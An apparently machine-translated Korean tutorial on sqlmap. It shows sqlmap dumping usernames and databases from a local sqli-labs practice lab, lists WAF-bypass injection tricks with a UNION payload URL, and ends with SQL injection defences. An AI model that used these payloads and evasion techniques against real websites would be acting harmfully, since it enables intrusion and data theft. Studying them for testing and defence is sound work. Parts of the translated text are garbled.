목차
1부: Sqlmap 사용
1.1 sqlmap 소개
1.4 sqlmap 실제 예
2.2 sql 주입 우회 waf 실험
3부: sqli 주입 방어
3.1 sql 주입 방어 방법
운영 및 유지보수 안전 SQLMap 및 SQLi 주입 방어 분석 방법

SQLMap 및 SQLi 주입 방어 분석 방법

May 11, 2023 pm 06:37 PM
sqlmap sqli

1부: Sqlmap 사용

1.1 sqlmap 소개

1. SQL 주입에 대한 몇 가지 기본 설명을 언급했지만 수동 주입은 강력한 SQL 주입 도구인 sqlmap을 사용하여 데이터를 얻을 수 있습니다.

2 .sqlmap 소개

(1)#sqlmap은 데이터베이스에 연결된 서버와 SQL 주입 취약점을 자동으로 탐지하고 악용할 수 있는 오픈 소스 침투 테스트 도구입니다. 매우 강력한 탐지 엔진, 다양한 기능을 갖춘 침투 테스터, 데이터베이스 지문 인식 및 대역 외 연결을 통한 명령 실행을 통한 기본 파일 시스템에 대한 액세스 기능을 갖추고 있습니다.

공식 웹사이트: sqlmap.org

SQLMap 및 SQLi 주입 방어 분석 방법

(2)#지원되는 데이터베이스:

MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft
Access, IBM DB2, SQLite, Firebird, Sybase 및 SAP MAXDB.

(3)#다중 주입 방법 지원

#UNION 쿼리 SQL 주입(쿼리 주입과 결합 가능)

#오류 기반 SQL 주입(오류 보고 주입)
#부울 기반 블라인드 SQL 주입(부울 주입)
#시간 기반 블라인드 SQL 주입(시간 지연 주입 기반)
#스택 쿼리 SQL 주입(다중 문 쿼리 주입)

1.2 sqlmap 설치 및 환경 구축

1 sqlmap 설치 주요 단계

(1. ) Python 환경 설치 --->sqlmap에는 Python 환경이 필요합니다

python 다운로드 주소: https://www.python.org/downloads/release/python-2715/)

SQLMap 및 SQLi 주입 방어 분석 방법

sqlmap은 Python2와 더 잘 호환됩니다. X 버전.( Python의 설치 단계는 바로 다음 단계로 진행할 수 있습니다. 수정해야 할 것은 sqlmap의 설치 경로입니다. 여기서는 C:UsersAdministratorpython으로 변경됩니다. 명령에서 sqlmap 디렉토리에 직접 들어가려면

(2) Python을 중국어 경로로 설치하지 말고 환경변수에 Python을 추가하세요.

SQLMap 및 SQLi 주입 방어 분석 방법

SQLMap 및 SQLi 주입 방어 분석 방법

(3) sqlmap을 다운로드 후 설치하고, 설치 디렉터리를 C:UsersAdministratorsqlmap으로 수정하세요.

(4) Python 환경 테스트: cmd 명령줄을 입력하고

python을 입력합니다.다음 메시지가 나타나면 설치가 성공한 것입니다.

C:UsersAdministrator>

python
Python 2.7.16 (v2.7.16 :413a49145e, 2019년 3월 4일, 01:37:19) win32의 [MSC v.1500 64비트(AMD64)] 자세한 내용을 보려면 "help", "copyright", "credits" 또는 "license"를 입력하세요.

> ;>> exit();

(5) sqlmap 테스트: cmd 명령줄을 입력하고 sqlmap.py -h를 입력합니다(경로 참고)

C:UsersAdministratorsqlmap>

sqlmap.py -h #도움말 보기 information

SQLMap 및 SQLi 주입 방어 분석 방법

1.3 sqlmap 공통 매개변수

#(1) 라이브러리 이름 및 열 이름 가져오기 ,Permissions

  • --dbs #모든 데이터베이스 가져오기

  • --dbms mysql #데이터베이스 유형 지정

  • --users #모든 데이터베이스 사용자(데이터베이스 로컬 사용자 이름)

  • --passwords # 데이터베이스 비밀번호 가져오기, (권한이 있는 경우에만 읽을 수 있음)

  • --기술 #어떤 주입을 지정할지 지정 사용할 유형

  • --current-db #현재 데이터베이스

  • -banner # 데이터베이스 식별 가져오기

  • -D 데이터베이스_이름 --tables #-D는 데이터를 지정하는 데 사용됩니다. --tables 특정 라이브러리 아래의 테이블을 가져옵니다

  • -D 데이터베이스_이름 -T 테이블_이름 --columns #-T는 테이블 이름을 지정합니다. --columns 열 필드 가져오기

  • -D 데이터베이스_이름 -T 테이블_이름 -C 컬럼_1,column_2 - -dump

                                                                                                                                                            권한 모든 사용자가 포함된 테이블에 대한 읽기 권한을 사용하면 모든 관리 사용자를 나열할 수 있습니다.

  • --current-user #데이터를 관리하는 사용자는 대부분의 데이터베이스에서 얻을 수 있습니다.

  • --is-dba #현재 사용자가 관리자인지 확인하고 관리자인 경우 True를 반환합니다.

  • --privileges #현재 사용자에게 모든 사용자가 포함된 테이블을 읽을 수 있는 권한이 있으면 각 사용자의 권한이 나열될 가능성이 높으며 sqlmap은 누가 데이터베이스의 최고 관리자인지 알려줍니다. -U 매개변수를 사용하여 보려는 사용자의 권한을 지정할 수도 있습니다.

  • --proxy #프록시 서버 지정 예: –proxy http://local:8080

  • #(2) 접미사 및 접미사 지정:

    • #sqlmap은 많은 간섭 문자를 감지할 수 없습니다. 닫을 때 접두사와 접미사를 수동으로 지정할 수 있습니다.

    • id=((('1'))) 및 1=1

    • #인 사용자에서 *를 선택하세요. - -prefix=PREFIX 페이로드 문자열 접두사 삽입

    • #–suffix=SUFFIX 페이로드 문자열 접미사 삽입
      예: sqlmap -u “www.target.com/index.php?id=1” -p id -- 접두사 "'))"
      --접미사 "AND ('1'='1"

    #(3) 결과 내보내기:

    • sqlmap -u "www.a.com/1.php ? id=1” --file-write=”d:/1.txt”

    • --file-dest=”E:/wwwroot/web/one.php”

    • --배치 완전 자동

    • --start=시작 번호--stop=끝 번호

    • --dump 데이터 내보내기

    • --dump-all 모든 데이터 내보내기

    • --purge-output/ -- purge 캐시 디렉터리 지우기

    • --sql-shell SQL 쿼리 분석기와 유사한 sqlshell 리바운드 기본 경로.sqlmap(sqlmap 클릭)

    1.4 sqlmap 실제 예

    #Less-1--Less65 일반 명령문(이것들은 문장은 가장 일반적으로 사용되는 매개 변수이므로 이해해야 합니다)

    #(1) 모든 라이브러리 이름 가져오기
    C:UsersAdministratorsqlmap>python sqlmap.py -u "http://localhost/sqli/Less -1?id =1" --dbs --dbms=mysql --batch

    # 분석:

    -u 뒤에 url이 있으면 테스트 url을 의미합니다

    --dbs는 모든 데이터베이스를 가져오는 것을 의미합니다

    -- dbms는 지정된 데이터베이스 유형은 mysql

    --batch는 자동으로 가져오는 것을 의미합니다.

    -D security --tables는 지정된 데이터베이스의 테이블 이름을 보안으로 가져오는 것을 의미합니다.

    -D security -T users --columns는 지정된 데이터베이스의 테이블 이름을 가져오는 것을 의미합니다. 데이터베이스를 보안으로 사용자 테이블의 열 이름

    -D security -T users -C 사용자 이름, 비밀번호 --dump # 보안 라이브러리, 사용자 테이블에 있는 사용자 이름 및 비밀번호 필드의 데이터 정보를 가져옵니다. --dump는 results

    #결과:
    [*] Challenge
    [*] dvwa
    [*] information_schema
    [*] mysql
    [*] owasp
    [*]performance_schema
    [*] security
    [*] test

    #(2) 현재 라이브러리 이름 가져오기
    C:UsersAdministratorsqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id=1" --current-db --batch
    # 결과:
    현재 데이터베이스: ' security'

    #(3) 현재 테이블 이름 가져오기
    C:UsersAdministratorsqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id=1 " -D security --tables -- 배치

    #결과:
    데이터베이스: security
    [4 테이블]
    +----------+
    | 이메일 |
    | 추천자 |
    | uagents |
    | users |
    +-- --------+


    #(4) 현재 열 이름 가져오기
    C:UsersAdministratorsqlmap>python sqlmap.py -u "http://localhost/ sqli/Less-1?id=1" -D security -T users --columns --batch

    #Result:
    Database: security
    Table: users
    [3열]
    +------ ----+------ --------+
    | 열 유형 |
    +----------+------------ -+
    | 아이디 | int(3) |
    | 사용자 이름 | varchar(20) |
    +--------- -----+

    # (5) 사용자 테이블에서 사용자 이름과 비밀번호 내용을 가져옵니다. C:UsersAdministratorsqlmap>python sqlmap.py -u "http://localhost/sqli/Less-1?id= 1" -D 보안 -T 사용자 -C 사용자 이름, 비밀번호 --dump --batch

    #결과:데이터베이스: security
    테이블: users
    [13개 항목]
    +--------- -+---------- --+
    | 사용자 이름 |
    +----------+------------+
    | |
    | 안젤리나 | 멍청해 |
    | 멍청해 |
    | | 관리자 |
    | 관리자1 |
    | 관리자3 |
    | 관리자4 |
    --------+

    번째 2부: sqli 주입을 위한 WAF 우회

    2.1 SQL 주입을 위한 WAF 우회 방법 소개


    참고: 다음은 우회 방법의 예일 뿐이며 실제 시나리오는 더 복잡합니다. .여러 가지 우회 방법을 혼합하여 사용할 수 있습니다.

    1. SQL 삽입 방법을 알고 나면

    #(1) 필터 주석

    #(2) Filter and or or
    • #(3) Filter select or Union
    • #(4) Filter blacklist
    • 2. Filtered and/or를 우회하는 방법은 무엇인가요? ) MySQL은 대소문자를 구분하지 않으며 올바르게 실행될 수 있습니다 ===>대문자 및 소문자 변형을 사용하세요
    • #(2) mysql은 16진수 또는 URL 인코딩을 지원합니다.

    • #(3) 단어를 기호로 대체 ===> 기호 우회 및(&&) 또는(| |)

    • # (4) 인라인 주석 및 여러 줄 주석 ===> 주석 추가 a/**/nd 이중 쓰기 우회 oORr

    3. 물론 다른 방법도 있습니다. 이러한 필터링 방법을 예로 들어 우회 방법에 대해 이야기하겠습니다.

    실제 장면에는 waf 장치가 있으며 실제로 waf는 일부 키워드로 필터링됩니다.

    2.2 sql 주입 우회 waf 실험

    1. 필터링된 주석 문자(예: 23 이하)

    #(1) 주석 문자 필터링 이유: 일반 SQL의 경우 명령문에서 주석 문자는 다음과 같습니다. 설명하는 역할을 합니다. 그러나 SQL 인젝션 취약점을 악용하는 과정에서 주석 문자는 닫는 작은따옴표, 여러 개의 작은따옴표, 큰따옴표, 단일괄호, 다중괄호 역할을 한다.
    한 줄 주석: --+ 또는 --space 또는 #
    여러 줄 주석: /* 여러 줄 주석 내용*/

    #(2) 필터 기능 preg_replace
    preg_replace(mixed $pattern, Mixed $replacement, Mixed $subject) : 정규식 검색 및 바꾸기를 수행합니다.
    $pattern: 검색할 패턴으로 문자열 또는 문자열 배열일 수 있습니다.
    $replacement: 대체에 사용되는 문자열 또는 문자열 배열입니다.
    $subject: 검색하고 바꿀 대상 문자열 또는 문자열 배열입니다.

    SQLMap 및 SQLi 주입 방어 분석 방법

    #(3) 주석 문자 우회:
    주석 문자를 사용하여 필터링하면 작은 따옴표 등을 성공적으로 닫을 수 없습니다. 아이디어를 변경하고 또는 '1'='1을 사용하여 작은 따옴표 등을 닫습니다.
    http://127.0.0.1/sqli/Less-23/?id=-1%27%20union%20select%201,database(),%273

    SQLMap 및 SQLi 주입 방어 분석 방법

    2. 필터링 후 우회하는 방법. 통과되었나요?(예: 25개 미만)

    (1) 소스 코드 분석: or 또는 and가 비어 있는

    SQLMap 및 SQLi 주입 방어 분석 방법

    (2) 작업 단계

    SQLMap 및 SQLi 주입 방어 분석 방법SQLMap 및 SQLi 주입 방어 분석 방법SQLMap 및 SQLi 주입 방어 분석 방법

    3. 필터링된 공백은 우회하는 방법(예: 26 미만)이어야 합니다.

    (1) %0a를 공백으로 사용

    SQLMap 및 SQLi 주입 방어 분석 방법

    4. 선택/결합 필터링을 우회하는 방법(예: 27 미만) )

    SQLMap 및 SQLi 주입 방어 분석 방법SQLMap 및 SQLi 주입 방어 분석 방법 SQLMap 및 SQLi 주입 방어 분석 방법

    SQLMap 및 SQLi 주입 방어 분석 방법SQLMap 및 SQLi 주입 방어 분석 방법

    3부: sqli 주입 방어

    3.1 sql 주입 방어 방법

    1. 일반적인 보호 조치:

    #(1), 오류 프롬프트 끄기: PHP에서 display_errors= 구성 파일 php.ini Off
    #(2), 매직 따옴표(addlashes와 동일한 효과): php.ini에서 Magic_quotes_gpc=On인 경우. 제출된 변수의 모든 작은따옴표('), 큰따옴표("), 백슬래시() 및 NUL(NULL 문자)은 자동으로 백슬래시
    #(3)을 포함하는 이스케이프 문자로 변환되고 데이터가 처리됩니다. 예를 들어 and/or/union
    #(4)과 같은 일반적인 키워드를 필터링하고 데이터베이스에 연결하기 위한 사용자 권한을 제어합니다. 각 라이브러리는 단일 라이브러리에 대한 관리자를 설정하며 루트 권한을 사용하지 않습니다.
    #(5), 사전 처리 및 매개변수화(PDO): 단순히 데이터를 "연결"하는 대신 사용자가 전달한 매개변수를 처리하고 부울 값을 반환하여 SQL 주입을 방지합니다.
    #(6), 하드웨어 보호 조치(WAF 및 기타 하드웨어)

위 내용은 SQLMap 및 SQLi 주입 방어 분석 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
3 몇 주 전 By 尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

Sqlmap 자동 주입의 샘플 분석 Sqlmap 자동 주입의 샘플 분석 May 13, 2023 pm 03:31 PM

sqlmap을 사용하여 dvwa에 대한 주입을 자동화하고, dvwa 수준을 낮게 설정하고, dvwa의 SQLInjection(SQLInjection(Blind))을 열고, 브라우저 디버깅을 열고, 사용자 ID를 입력하고 제출하고, 가로채는 요청을 봅니다. GET 요청임을 알 수 있습니다. URL은 "http://192.168.1.222:8089/dvwa/vulnerability/sqli/?id=1&Submit=Submit#"입니다. 테스트를 위해 salmap에 직접 넣고 다음을 사용합니다. u 명령 -u"http://192.168.1.22

sqlmap에 대한 문제를 분석하는 방법 sqlmap에 대한 문제를 분석하는 방법 May 27, 2023 pm 01:07 PM

0x00 개요 최근 sqlmap 인젝션 테스트를 하다가 이상한 현상이 발생했습니다. sqlmap 상위 버전에서는 인젝션을 감지할 수 있는데, 하위 버전에서는 인젝션을 감지할 수 있고, 이후에는 오탐이 아닌 데이터가 실행될 수 있습니다. sqlmap 소스코드를 비교 테스트하고 살펴보니 작은 구멍 두 개가 발견되었습니다. 0x01 시나리오 재현 주입 지점 형식: json..."whereparams":[{"name":"keyWord","value":"test"}]} 주입 가능한 매개 변수: valuesqlmap 명령: pythonsqlmap.py-rsqlpk.txt– 플러시 -session-vvsqlmapv1.2.11은 s를 주입할 수 없습니다.

SQLMAP의 양파 모드 프록시는 무엇입니까? SQLMAP의 양파 모드 프록시는 무엇입니까? May 26, 2023 am 09:56 AM

외부 웹사이트에 대한 침투 테스트가 필요하기 때문에 대부분의 웹사이트는 접속 빈도를 통제하고 있으며, 이 빈도를 초과하면 해당 IP는 바로 차단됩니다. 특히 SQLMAP이 실행 중인 경우에는 더욱 "아줌마 레드"가 되며 SQLMAP 실행이 완료되기 전에 오류가 보고되고 종료됩니다. 그래서 SQLMAP의 프록시 모드에 대해 연구하기 시작했습니다. SQLMAP에는 두 가지 프록시 모드가 있습니다. 하나는 일반 프록시(HTTP 프록시)이고 다른 하나는 어니언 프록시입니다. 원래는 일반 에이전트의 적용에 대해 쓰고 싶었지만 Baidu는 이 기사가 충분히 상세하다는 것을 보고 말도 안되는 이야기를 중단했습니다. Sqlmap 확장 - 외부 IP 프록시 풀 구현 어니언 프록시를 중심으로 살펴보겠습니다. 처음에는 어니언을 직접 인젝션할 때 "이모 레드" 리포트가 없었지만, 이후에는 침투하는 웹사이트가 많아졌습니다.

SQLMap 및 SQLi 주입 방어 분석 방법 SQLMap 및 SQLi 주입 방어 분석 방법 May 11, 2023 pm 06:37 PM

1부: Sqlmap 사용 1.1 sqlmap 소개 1. sql 주입에 대한 몇 가지 기본 설명을 언급했지만 수동 주입은 매우 번거로운 작업입니다. 강력한 sql 주입 도구인 sqlmap을 사용하여 데이터를 얻을 수 있습니다. 2. sqlmap 소개 (1) # sqlmap은 데이터베이스에 연결된 서버와 SQL 인젝션 취약점을 자동으로 탐지하고 악용할 수 있는 오픈소스 침투 테스트 도구입니다. 매우 강력한 탐지 엔진, 다양한 기능을 갖춘 침투 테스터, 데이터베이스 지문 인식 및 대역 외 연결을 통한 명령 실행을 통한 기본 파일 시스템에 대한 액세스 기능을 갖추고 있습니다. 공식 웹사이트: sqlmap.org(2)#지원되는 데이터베이스: MySQL, Oracle, PostgreS

sqlmap 시간 기반 주입 분석을 구현하는 방법 sqlmap 시간 기반 주입 분석을 구현하는 방법 May 12, 2023 pm 12:10 PM

1. 서문 SQL 인젝션을 탐지하는 방법은 무엇입니까? 내 대답은 다음과 같습니다. 당사자 A가 보안을 수행할 때 SQL 주입 감지는 상대적으로 쉽습니다. 1) 오류 주입 감지. 2) 오탐률이 상대적으로 높으므로 부울 오류 보고서를 삽입하지 마세요. 3) 시간 기반의 시간 주입, 접점 운영 및 유지 관리를 수행하여 느린 로그 DB 기록, 모니터 수면 및 벤치마크 키워드 모니터링을 수행합니다. 스캔 작업의 ID 번호를 수면 시간의 소수점 자리에 추가하여 위치 지정을 용이하게 할 수 있습니다. (p.s. 이 방법으로 SQL 주입을 99% 찾아낼 수 있습니다.) 그래서 시간 기반의 시간 주입을 할 때 시간 오류를 매우 가혹하게 제한합니다. 하지만 @chengable은 t를 기반으로 Party B에서 보안 관련 작업을 수행하고 있습니다.

sqlmap 처리 서명 암호화 아이디어 sqlmap 처리 서명 암호화 아이디어 May 14, 2023 am 11:52 AM

회사 APP를 테스트해보니 모든 매개변수 내용에 32비트 문자를 추가하고 최종적으로 MD5 암호화를 수행한 것으로 나타났습니다. APP 처리 과정에서는 먼저 서명이 맞는지 검증하기 때문에 서명 검증에 실패하면 아예 데이터베이스에 들어갈 수 없게 되므로 이를 테스트하기 위해 프록시 데이터에 대한 스크립트를 작성했습니다. 데이터 패킷의 매개변수 내용과 32자를 암호화하여 교체합니다. 참고: 이 스크립트는 암호화 프로세스를 알 수 있거나 프런트 엔드 JS의 암호화 방법을 얻을 수 있으므로 회사 내부 시스템에 적합합니다. 먼저 Django를 사용하여 회사 시스템을 시뮬레이션하는 프로그램을 작성했습니다. 프로세스는 POST ID와 토큰을 얻고 사용자 정의 암호화 단어를 추가하는 것이었습니다.

sqlmap _dns 주입 구성 방법은 무엇입니까? sqlmap _dns 주입 구성 방법은 무엇입니까? May 12, 2023 pm 12:25 PM

인터넷에는 sqlmap에 대한 DNS 주입 관련 기사가 너무 적습니다. 그들은 --dns-domain 매개변수를 간략하게 소개합니다. 관련 실제 기사가 모호하거나 한 획으로 언급되어 혼란스럽습니다(주로 부정직합니다. 핵심은 다음과 같습니다). 아직 빅 보스는 아닙니다). 그러다가 인터넷에 있는 방법들을 참고해서 다시 해봤습니다. 준비해야 할 것은 sqlmap 1개, 윈도우 블라인드 인젝션, 도메인네임 2개, 외부 네트워크 서버 1개이다. 한번은 뭔가를 하다가 타임블라인드 인젝션을 우연히 발견했는데, 마침 윈도우즈 머신이었는데, DNS 인젝션 방법이 생각나더군요. 시작하기 전에 sqlmap의 --sql-shell 명령을 사용하여 dns 주입 페이로드를 테스트할 계획입니다. 먼저 burpsuite로 이동합니다.

sqlmapGetshell을 사용하는 방법 sqlmapGetshell을 사용하는 방법 May 13, 2023 pm 06:25 PM

sqlmap은 파일을 읽고 씁니다. –file-read: 백엔드 데이터베이스 관리 시스템 파일 시스템에서 파일을 읽습니다. –file-write: 백엔드 데이터베이스 관리 시스템 파일 시스템의 로컬 파일을 편집합니다(로컬에서 쓰기) –file-dest: 백엔드 데이터베이스 관리 시스템이 작성한 파일의 절대 경로(쓰기 대상 경로) SQL 인젝션 후 위의 명령을 사용하여 시스템 파일을 읽고 쓸 수 있지만 전제 조건은 읽기 및 쓰기가 필요하다는 것입니다. 권한이 있고 dba 권한이어야 합니다. 그렇지 않으면 읽기 및 쓰기 작업을 성공적으로 수행할 수 없습니다. DVWA를 예로 들면, kali에서 DVWA를 빌드하여 파일을 읽고 쓰세요. 파일 읽기: PHPinfo에서 관련 정보를 확인하고 -file-r을 사용하세요.

See all articles